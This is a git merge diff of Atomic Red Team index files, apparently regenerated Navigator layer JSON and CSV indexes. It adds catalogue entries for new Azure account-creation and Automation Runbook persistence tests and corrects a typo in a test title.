Merge branch 'redcanaryco:master' into gk-atomic-red-team-T1531-Account-Deletion

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- Azure AD - Create a new use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}

atomics/Indexes/Indexes-CSV/azure-ad-index.csv

@@ -7,7 +7,8 @@ defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
-persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new use,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
 persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
 persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell

atomics/Indexes/Indexes-CSV/iaas-index.csv

@@ -4,6 +4,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
@@ -15,8 +16,11 @@ persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
 collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
 collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell

atomics/Indexes/Indexes-CSV/index.csv

@@ -442,6 +442,7 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
@@ -634,6 +635,7 @@ privilege-escalation,T1574.002,Hijack Execution Flow: DLL Side-Loading,2,DLL Sid
 privilege-escalation,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
 privilege-escalation,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 privilege-escalation,T1055.001,Process Injection: Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
@@ -861,7 +863,8 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,15,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,1d958c61-09c6-4d9e-b26b-4130314e520e,powershell
 persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,16,secedit used to create a Run key in the HKLM Hive,14fdc3f1-6fc3-4556-8d36-aa89d9d42d02,command_prompt
 persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
-persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new use,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
